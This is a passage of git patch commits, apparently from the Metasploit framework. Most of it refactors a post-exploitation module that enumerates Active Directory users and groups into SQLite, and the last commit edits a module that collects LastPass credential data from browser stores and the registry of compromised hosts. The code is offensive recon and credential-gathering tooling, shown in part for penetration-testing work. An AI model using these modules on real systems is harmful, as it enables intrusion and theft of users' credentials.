account_disabled?(uac.to_i) -# status = Metasploit::Model::Login::Status::DISABLED -# elsif account_locked?(lockout_time.to_i) -# status = Metasploit::Model::Login::Status::LOCKED_OUT -# else -# status = Metasploit::Model::Login::Status::UNTRIED -# end -# -# # Assemble the options hash for creating the Metasploit::Credential::Login object -# login_data = { -# core: credential_core, -# status: status -# } -# -# login_data[:last_attempted_at] = DateTime.now unless (status == Metasploit::Model::Login::Status::UNTRIED) -# -# # Merge in the service data and create our Login -# login_data.merge!(service_data) -# create_credential_login(login_data) -# end -#end From 0ddb40b55e9f06395cd6efee4c57c90f8b9626ca Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 01:23:29 +0000 Subject: [PATCH 081/686] Added UNIQUE and FOREIGN KEY constraints to SQLite DB --- .../windows/gather/ad_groupusers_to_sql.rb | 26 ++++++++++++------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 9acbba37ed..fa716d5a47 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -70,9 +70,9 @@ class Metasploit3 < Msf::Post # Add the group to the database sql_param_group = { :rid => group_rid.to_i, - :distinguishedName => individual_group[0][:value], - :sAMAccountName => individual_group[3][:value], - :description => individual_group[4][:value] + :distinguishedName => individual_group[0][:value].to_s, + :sAMAccountName => individual_group[3][:value].to_s, + :description => individual_group[4][:value].to_s } db.execute("insert into ad_groups (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_group) @@ -83,9 +83,9 @@ class Metasploit3 < Msf::Post # Add the group to the database sql_param_user = { :rid => user_rid.to_i, - :distinguishedName => group_user[0][:value], - :sAMAccountName => group_user[3][:value], - :description => group_user[5][:value] + :distinguishedName => group_user[0][:value].to_s, + :sAMAccountName => group_user[3][:value].to_s, + :description => group_user[5][:value.to_s] } db.execute("replace into ad_users (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_user) @@ -104,6 +104,9 @@ class Metasploit3 < Msf::Post end print_status "Enumerated #{group_counter} group(s)" + if db and db.close + print_status "Database closed: #{dbfile.to_s}" + end end # Creat the SQLite Database @@ -113,32 +116,37 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(filename) # Create the table for the AD Groups + db.execute('DROP TABLE IF EXISTS ad_groups') sql_table_group = 'CREATE TABLE ad_groups ('\ 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'sAMAccountName TEXT,'\ + 'sAMAccountName TEXT UNIQUE,'\ 'description TEXT'\ 'whenChanged TEXT,'\ 'whenCreated TEXT)' db.execute(sql_table_group) # Create the table for the AD Users + db.execute('DROP TABLE IF EXISTS ad_users') sql_table_users = 'CREATE TABLE ad_users ('\ 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ 'description TEXT,'\ 'sAMAccountName TEXT,'\ 'logonCount INTEGER,'\ - 'userPrincipalName TEXT,'\ + 'userPrincipalName TEXT UNIQUE,'\ 'whenCreated TEXT,'\ 'whenChanged TEXT)' db.execute(sql_table_users) # Create the table for the mapping between the two (membership) + db.execute('DROP TABLE IF EXISTS ad_mapping') sql_table_mapping = 'CREATE TABLE ad_mapping ('\ 'user_rid INTEGER NOT NULL,' \ 'group_rid INTEGER NOT NULL,'\ - 'PRIMARY KEY (user_rid, group_rid))' + 'PRIMARY KEY (user_rid, group_rid),'\ + 'FOREIGN KEY(user_rid) REFERENCES ad_users(rid)'\ + 'FOREIGN KEY(group_rid) REFERENCES ad_groups(rid))' db.execute(sql_table_mapping) return db, filename From 1ba6b919689f45e24e0bd1c9916c818d9b9e62d4 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 01:24:43 +0000 Subject: [PATCH 082/686] More accurate description --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index fa716d5a47..910d723146 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -18,8 +18,7 @@ class Metasploit3 < Msf::Post 'Name' => 'AD Group & User Membership to Offline SQL Database', 'Description' => %{ This module will gather a list of AD groups, identify the users (taking into account recursion) - and optionally write this to a greppable file, a SQLite database or a mysql-compatible SQL file - for offline analysis. + and write this to a SQLite database for offline analysis and query using normal SQL syntax. }, 'License' => MSF_LICENSE, 'Author' => [ From eb38859ecc71280c2c9ee425e325fcfad1ad8f46 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 01:40:37 +0000 Subject: [PATCH 083/686] Finally worked out how to use .map to make the SQL stuff far more elegant --- .../windows/gather/ad_groupusers_to_sql.rb | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 910d723146..217244ad2d 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated'] + users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated','primaryGroupID','badPwdCount'] group_counter = 0 groups[:results].each do |individual_group| begin @@ -84,9 +84,18 @@ class Metasploit3 < Msf::Post sql_param_user = { :rid => user_rid.to_i, :distinguishedName => group_user[0][:value].to_s, :sAMAccountName => group_user[3][:value].to_s, - :description => group_user[5][:value.to_s] + :displayName => group_user[4][:value].to_s, + :description => group_user[5][:value].to_s, + :logonCount => group_user[6][:value].to_i, + :userPrincipalName => group_user[8][:value].to_s, + :whenChanged => group_user[8][:value].to_s, + :whenCreated => group_user[8][:value].to_s, + :primaryGroupID => group_user[9][:value].to_i, + :badPwdCount => group_user[10][:value].to_i } - db.execute("replace into ad_users (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_user) + + sql_param_bind_params = sql_param_user.keys.map {|k| ":#{k}"} + db.execute("replace into ad_users (#{sql_param_user.keys.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", sql_param_user) # Now associate the user with the group sql_param_mapping = { :user_rid => user_rid.to_i, @@ -131,8 +140,11 @@ class Metasploit3 < Msf::Post 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ 'description TEXT,'\ + 'displayName TEXT,'\ 'sAMAccountName TEXT,'\ 'logonCount INTEGER,'\ + 'primaryGroupID INTEGER,'\ + 'badPwdCount INTEGER,'\ 'userPrincipalName TEXT UNIQUE,'\ 'whenCreated TEXT,'\ 'whenChanged TEXT)' From 36adbadb11534dde392df0c5b4466ff0262453c1 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 01:59:19 +0000 Subject: [PATCH 084/686] Tidied up SQL searching and added file size indicator --- .../windows/gather/ad_groupusers_to_sql.rb | 26 ++++++++++++------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 217244ad2d..3bba8b74cd 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -71,9 +71,11 @@ class Metasploit3 < Msf::Post sql_param_group = { :rid => group_rid.to_i, :distinguishedName => individual_group[0][:value].to_s, :sAMAccountName => individual_group[3][:value].to_s, - :description => individual_group[4][:value].to_s + :whenChanged => individual_group[4][:value].to_s, + :whenCreated => individual_group[5][:value].to_s, + :description => individual_group[6][:value].to_s } - db.execute("insert into ad_groups (rid, distinguishedName, sAMAccountName, description) VALUES (:rid,:distinguishedName,:sAMAccountName,:description)", sql_param_group) + run_sqlite_query(db, 'ad_groups',sql_param_group) # Go through each of the users in the group users_in_group[:results].each do |group_user| @@ -93,15 +95,13 @@ class Metasploit3 < Msf::Post :primaryGroupID => group_user[9][:value].to_i, :badPwdCount => group_user[10][:value].to_i } - - sql_param_bind_params = sql_param_user.keys.map {|k| ":#{k}"} - db.execute("replace into ad_users (#{sql_param_user.keys.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", sql_param_user) + run_sqlite_query(db, 'ad_users',sql_param_user) # Now associate the user with the group sql_param_mapping = { :user_rid => user_rid.to_i, :group_rid => group_rid.to_i } - db.execute("insert into ad_mapping (user_rid,group_rid) VALUES (:user_rid,:group_rid)", sql_param_mapping) + run_sqlite_query(db, 'ad_mapping',sql_param_mapping) group_counter += 1 end @@ -113,10 +113,18 @@ class Metasploit3 < Msf::Post print_status "Enumerated #{group_counter} group(s)" if db and db.close - print_status "Database closed: #{dbfile.to_s}" + f = ::File.size(dbfile.to_s) + print_status "Database closed: #{dbfile.to_s} at #{f} byte(s)" end end + # Run the parameterised SQL query + def run_sqlite_query(db,table_name,values) + sql_param_columns = values.keys + sql_param_bind_params = values.keys.map {|k| ":#{k}"} + db.execute("replace into #{table_name} (#{sql_param_columns.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", values) + end + # Creat the SQLite Database def create_sqlite_db begin @@ -128,8 +136,8 @@ class Metasploit3 < Msf::Post sql_table_group = 'CREATE TABLE ad_groups ('\ 'rid INTEGER PRIMARY KEY NOT NULL,'\ 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'sAMAccountName TEXT UNIQUE,'\ - 'description TEXT'\ + 'sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'description TEXT,'\ 'whenChanged TEXT,'\ 'whenCreated TEXT)' db.execute(sql_table_group) From 38b6ad4dbf79828afa107083c3be15f4e2d857f9 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 02:00:57 +0000 Subject: [PATCH 085/686] msftidy --- .../post/windows/gather/ad_groupusers_to_sql.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 3bba8b74cd..7cbef1bc4e 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post def initialize(info = {}) super(update_info( info, - 'Name' => 'AD Group & User Membership to Offline SQL Database', + 'Name' => 'AD Group and User Membership to Offline SQLite Database Recon Module', 'Description' => %{ This module will gather a list of AD groups, identify the users (taking into account recursion) and write this to a SQLite database for offline analysis and query using normal SQL syntax. @@ -66,9 +66,9 @@ class Metasploit3 < Msf::Post users_in_group = query(users_filter, max_search, users_fields) next if users_in_group.nil? || users_in_group[:results].empty? group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) - + # Add the group to the database - sql_param_group = { :rid => group_rid.to_i, + sql_param_group = { :rid => group_rid.to_i, :distinguishedName => individual_group[0][:value].to_s, :sAMAccountName => individual_group[3][:value].to_s, :whenChanged => individual_group[4][:value].to_s, @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Post print_line "Group [#{individual_group[3][:value].to_s}][#{group_rid.to_s}] has member [#{group_user[3][:value].to_s}][#{user_rid.to_s}]" # Add the group to the database - sql_param_user = { :rid => user_rid.to_i, + sql_param_user = { :rid => user_rid.to_i, :distinguishedName => group_user[0][:value].to_s, :sAMAccountName => group_user[3][:value].to_s, :displayName => group_user[4][:value].to_s, @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Post run_sqlite_query(db, 'ad_users',sql_param_user) # Now associate the user with the group - sql_param_mapping = { :user_rid => user_rid.to_i, + sql_param_mapping = { :user_rid => user_rid.to_i, :group_rid => group_rid.to_i } run_sqlite_query(db, 'ad_mapping',sql_param_mapping) @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Post begin filename = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('ad', 5)}.db" db = SQLite3::Database.new(filename) - + # Create the table for the AD Groups db.execute('DROP TABLE IF EXISTS ad_groups') sql_table_group = 'CREATE TABLE ad_groups ('\ @@ -194,4 +194,4 @@ class Metasploit3 < Msf::Post ret = '0' + ret if ret.length < 2 ret end -end +end From f13ca17de0e75b33997564d31d463c5a80cdfa32 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 02:01:38 +0000 Subject: [PATCH 086/686] rubocop --- .../windows/gather/ad_groupusers_to_sql.rb | 207 +++++++++--------- 1 file changed, 104 insertions(+), 103 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 7cbef1bc4e..917410213f 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -34,16 +34,16 @@ class Metasploit3 < Msf::Post max_search = datastore['MAX_SEARCH'] db, dbfile = create_sqlite_db - print_status "Database created: #{dbfile.to_s}" + print_status "Database created: #{dbfile}" # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin group_filter = '(objectClass=group)' - group_fields = ['distinguishedName','objectSid','samAccountType','sAMAccountName','whenChanged','whenCreated','description'] + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description'] groups = query(group_filter, max_search, group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Error(Group): #{e.message.to_s}") + print_error("Error(Group): #{e.message}") return end @@ -55,143 +55,144 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName','objectSid','sAMAccountType','sAMAccountName','displayName','description','logonCount','userAccountControl','userPrincipalName','whenChanged','whenCreated','primaryGroupID','badPwdCount'] + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount'] group_counter = 0 groups[:results].each do |individual_group| begin # Perform the ADSI query to retrieve the effective users in each group (recursion) - vprint_status "Retrieving members of #{individual_group[3][:value].to_s}" - users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value].to_s}))" + vprint_status "Retrieving members of #{individual_group[3][:value]}" + users_filter = "(&(objectCategory=person)(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]}))" users_in_group = query(users_filter, max_search, users_fields) next if users_in_group.nil? || users_in_group[:results].empty? group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) # Add the group to the database - sql_param_group = { :rid => group_rid.to_i, - :distinguishedName => individual_group[0][:value].to_s, - :sAMAccountName => individual_group[3][:value].to_s, - :whenChanged => individual_group[4][:value].to_s, - :whenCreated => individual_group[5][:value].to_s, - :description => individual_group[6][:value].to_s + sql_param_group = { rid: group_rid.to_i, + distinguishedName: individual_group[0][:value].to_s, + sAMAccountName: individual_group[3][:value].to_s, + whenChanged: individual_group[4][:value].to_s, + whenCreated: individual_group[5][:value].to_s, + description: individual_group[6][:value].to_s } - run_sqlite_query(db, 'ad_groups',sql_param_group) + run_sqlite_query(db, 'ad_groups', sql_param_group) # Go through each of the users in the group users_in_group[:results].each do |group_user| user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) - print_line "Group [#{individual_group[3][:value].to_s}][#{group_rid.to_s}] has member [#{group_user[3][:value].to_s}][#{user_rid.to_s}]" + print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" # Add the group to the database - sql_param_user = { :rid => user_rid.to_i, - :distinguishedName => group_user[0][:value].to_s, - :sAMAccountName => group_user[3][:value].to_s, - :displayName => group_user[4][:value].to_s, - :description => group_user[5][:value].to_s, - :logonCount => group_user[6][:value].to_i, - :userPrincipalName => group_user[8][:value].to_s, - :whenChanged => group_user[8][:value].to_s, - :whenCreated => group_user[8][:value].to_s, - :primaryGroupID => group_user[9][:value].to_i, - :badPwdCount => group_user[10][:value].to_i + sql_param_user = { rid: user_rid.to_i, + distinguishedName: group_user[0][:value].to_s, + sAMAccountName: group_user[3][:value].to_s, + displayName: group_user[4][:value].to_s, + description: group_user[5][:value].to_s, + logonCount: group_user[6][:value].to_i, + userPrincipalName: group_user[8][:value].to_s, + whenChanged: group_user[8][:value].to_s, + whenCreated: group_user[8][:value].to_s, + primaryGroupID: group_user[9][:value].to_i, + badPwdCount: group_user[10][:value].to_i } - run_sqlite_query(db, 'ad_users',sql_param_user) + run_sqlite_query(db, 'ad_users', sql_param_user) # Now associate the user with the group - sql_param_mapping = { :user_rid => user_rid.to_i, - :group_rid => group_rid.to_i + sql_param_mapping = { user_rid: user_rid.to_i, + group_rid: group_rid.to_i } - run_sqlite_query(db, 'ad_mapping',sql_param_mapping) + run_sqlite_query(db, 'ad_mapping', sql_param_mapping) group_counter += 1 end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Error(Users): #{e.message.to_s}") + print_error("Error(Users): #{e.message}") return end end print_status "Enumerated #{group_counter} group(s)" - if db and db.close - f = ::File.size(dbfile.to_s) - print_status "Database closed: #{dbfile.to_s} at #{f} byte(s)" + if db && db.close + f = ::File.size(dbfile.to_s) + print_status "Database closed: #{dbfile} at #{f} byte(s)" end end - # Run the parameterised SQL query - def run_sqlite_query(db,table_name,values) - sql_param_columns = values.keys - sql_param_bind_params = values.keys.map {|k| ":#{k}"} - db.execute("replace into #{table_name} (#{sql_param_columns.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", values) - end + # Run the parameterised SQL query + def run_sqlite_query(db, table_name, values) + sql_param_columns = values.keys + sql_param_bind_params = values.keys.map { |k| ":#{k}" } + db.execute("replace into #{table_name} (#{sql_param_columns.join(',')}) VALUES (#{sql_param_bind_params.join(',')})", values) + end - # Creat the SQLite Database - def create_sqlite_db - begin - filename = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('ad', 5)}.db" - db = SQLite3::Database.new(filename) + # Creat the SQLite Database + def create_sqlite_db + begin + filename = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('ad', 5)}.db" + db = SQLite3::Database.new(filename) - # Create the table for the AD Groups - db.execute('DROP TABLE IF EXISTS ad_groups') - sql_table_group = 'CREATE TABLE ad_groups ('\ - 'rid INTEGER PRIMARY KEY NOT NULL,'\ - 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'sAMAccountName TEXT UNIQUE NOT NULL,'\ - 'description TEXT,'\ - 'whenChanged TEXT,'\ - 'whenCreated TEXT)' - db.execute(sql_table_group) + # Create the table for the AD Groups + db.execute('DROP TABLE IF EXISTS ad_groups') + sql_table_group = 'CREATE TABLE ad_groups ('\ + 'rid INTEGER PRIMARY KEY NOT NULL,'\ + 'distinguishedName TEXT UNIQUE NOT NULL,'\ + 'sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'description TEXT,'\ + 'whenChanged TEXT,'\ + 'whenCreated TEXT)' + db.execute(sql_table_group) - # Create the table for the AD Users - db.execute('DROP TABLE IF EXISTS ad_users') - sql_table_users = 'CREATE TABLE ad_users ('\ - 'rid INTEGER PRIMARY KEY NOT NULL,'\ - 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'description TEXT,'\ - 'displayName TEXT,'\ - 'sAMAccountName TEXT,'\ - 'logonCount INTEGER,'\ - 'primaryGroupID INTEGER,'\ - 'badPwdCount INTEGER,'\ - 'userPrincipalName TEXT UNIQUE,'\ - 'whenCreated TEXT,'\ - 'whenChanged TEXT)' - db.execute(sql_table_users) + # Create the table for the AD Users + db.execute('DROP TABLE IF EXISTS ad_users') + sql_table_users = 'CREATE TABLE ad_users ('\ + 'rid INTEGER PRIMARY KEY NOT NULL,'\ + 'distinguishedName TEXT UNIQUE NOT NULL,'\ + 'description TEXT,'\ + 'displayName TEXT,'\ + 'sAMAccountName TEXT,'\ + 'logonCount INTEGER,'\ + 'primaryGroupID INTEGER,'\ + 'badPwdCount INTEGER,'\ + 'userPrincipalName TEXT UNIQUE,'\ + 'whenCreated TEXT,'\ + 'whenChanged TEXT)' + db.execute(sql_table_users) - # Create the table for the mapping between the two (membership) - db.execute('DROP TABLE IF EXISTS ad_mapping') - sql_table_mapping = 'CREATE TABLE ad_mapping ('\ - 'user_rid INTEGER NOT NULL,' \ - 'group_rid INTEGER NOT NULL,'\ - 'PRIMARY KEY (user_rid, group_rid),'\ - 'FOREIGN KEY(user_rid) REFERENCES ad_users(rid)'\ - 'FOREIGN KEY(group_rid) REFERENCES ad_groups(rid))' - db.execute(sql_table_mapping) + # Create the table for the mapping between the two (membership) + db.execute('DROP TABLE IF EXISTS ad_mapping') + sql_table_mapping = 'CREATE TABLE ad_mapping ('\ + 'user_rid INTEGER NOT NULL,' \ + 'group_rid INTEGER NOT NULL,'\ + 'PRIMARY KEY (user_rid, group_rid),'\ + 'FOREIGN KEY(user_rid) REFERENCES ad_users(rid)'\ + 'FOREIGN KEY(group_rid) REFERENCES ad_groups(rid))' + db.execute(sql_table_mapping) - return db, filename - rescue SQLite3::Exception => e - print_error("Error(Database): #{e.message.to_s}") - return - end - end + return db, filename + rescue SQLite3::Exception => e + print_error("Error(Database): #{e.message}") + return + end + end - # Convert the SID raw data to a string. TODO fix this mess.... - # THIS NEEDS FIXING FIXME FIXME - def sid_hex_to_string(data) - sid = [] - sid << data[0].to_s - rid = '' - (6).downto(1) do |i| - rid += byte2hex(data[i, 1][0]) - end - sid << rid.to_i.to_s - sid += data.unpack("bbbbbbbbV*")[8..-1] - final_sid = "S-" + sid.join('-') - return final_sid, sid[-1] - end - def byte2hex(b) - ret = '%x' % (b.to_i & 0xff) - ret = '0' + ret if ret.length < 2 - ret - end + # Convert the SID raw data to a string. TODO fix this mess.... + # THIS NEEDS FIXING FIXME FIXME + def sid_hex_to_string(data) + sid = [] + sid << data[0].to_s + rid = '' + (6).downto(1) do |i| + rid += byte2hex(data[i, 1][0]) + end + sid << rid.to_i.to_s + sid += data.unpack("bbbbbbbbV*")[8..-1] + final_sid = "S-" + sid.join('-') + [final_sid, sid[-1]] + end + + def byte2hex(b) + ret = '%x' % (b.to_i & 0xff) + ret = '0' + ret if ret.length < 2 + ret + end end From ccb13a2ca6356867190ff8d764d5fbee3627a734 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Thu, 17 Dec 2015 20:29:50 -0800 Subject: [PATCH 087/686] Add full IE support and bug fixes --- modules/post/multi/gather/lastpass_creds.rb | 177 ++++++++++++-------- 1 file changed, 109 insertions(+), 68 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 3793f204b2..66ef12231c 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post 'Jon Hart %w(linux osx unix win), - 'References' => [['URL', 'http://www.martinvigo.com/a-look-into-lastpass/']], + 'References' => [['URL', 'http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it']], 'SessionTypes' => %w(meterpreter shell) ) ) @@ -58,7 +58,6 @@ class Metasploit3 < Msf::Post print_lastpass_data(account_map) end - # Returns a mapping of lastpass accounts def build_account_map platform = session.platform @@ -77,22 +76,19 @@ class Metasploit3 < Msf::Post 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", - 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", - 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" } localstorage_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", 'Firefox' => "#{user_profile['LocalAppData']}Low\\LastPass", 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", - 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", - 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" } cookies_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Cookies", 'Firefox' => "", # It's set programmatically 'IE' => "#{user_profile['LocalAppData']}\\Microsoft\\Windows\\INetCookies\\Low", - 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Cookies", - 'Safari' => "" + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Cookies" } when /unix|linux/ browser_path_map = { @@ -108,8 +104,7 @@ class Metasploit3 < Msf::Post cookies_path_map = { #TODO 'Chrome' => "", 'Firefox' => "", - 'Opera' => "", - 'Safari' => "" + 'Opera' => "" } when /osx/ browser_path_map = { @@ -143,11 +138,11 @@ class Metasploit3 < Msf::Post if session.type == "meterpreter" account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if client.fs.file.exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) - #account_map[account][browser]['cookies_db'] = cookies_path_map[browser]['lp_db_path'].gsub("prefs.js", "cookies.sqlite") if client.fs.file.exists?(cookies_path_map[browser]['lp_db_path']) && browser == 'Firefox' + account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') else # session.type == "shell" account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if session.shell_command("ls \"#{localstorage_path_map[browser]}\"").strip == localstorage_path_map[browser].strip || browser.match(/Firefox|IE/) account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if session.shell_command("ls \"#{cookies_path_map[browser]}\"").strip == cookies_path_map[browser].strip || browser.match(/Firefox|IE/) - #account_map[account][browser]['cookies_db'] = cookies_path_map[browser]['lp_db_path'] if session.shell_command("ls \"#{cookies_path_map[browser]['lp_db_path']}\"").strip == cookies_path_map[browser]['lp_db_path'].strip && browser == 'Firefox' + account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (session.shell_command("ls \"#{account_map[account][browser]['lp_db_path']}\"").strip == account_map[account][browser]['lp_db_path'].strip && browser == 'Firefox') end else account_map[account].delete(browser) @@ -164,13 +159,9 @@ class Metasploit3 < Msf::Post vprint_status "Checking #{account}'s #{browser}" if browser == "IE" # Special case for IE - root_key, base_key = session.sys.registry.splitkey('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass') - reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) - return [] if not reg_key - reg_value = reg_key.query_value("LoginUsers") - return [] if not reg_value - paths |= ['HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass'] if !reg_value.data.blank? && path != "Low\\LastPass" # Hacky way to detect if there is access to user's data (attacker has no root access) - reg_key.close + data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") if data.blank? + paths |= ['HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass'] if !data.blank? && path != "Low\\LastPass" # Hacky way to detect if there is access to user's data (attacker has no root access) elsif browser == "Firefox" # Special case for Firefox paths |= firefox_profile_files(path, browser) else @@ -262,28 +253,24 @@ class Metasploit3 < Msf::Post [found_dbs_paths] end - - # Parses the Firefox preferences file and returns encoded credentials def ie_firefox_credentials(prefs_path, localstorage_db_path) credentials = [] data = nil if(prefs_path == nil) # IE - root_key, base_key = session.sys.registry.splitkey('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass') - reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) - return [] if not reg_key - reg_value = reg_key.query_value("LoginUsers") - return [] if not reg_value - usernames = reg_value.data.split("|") + data = 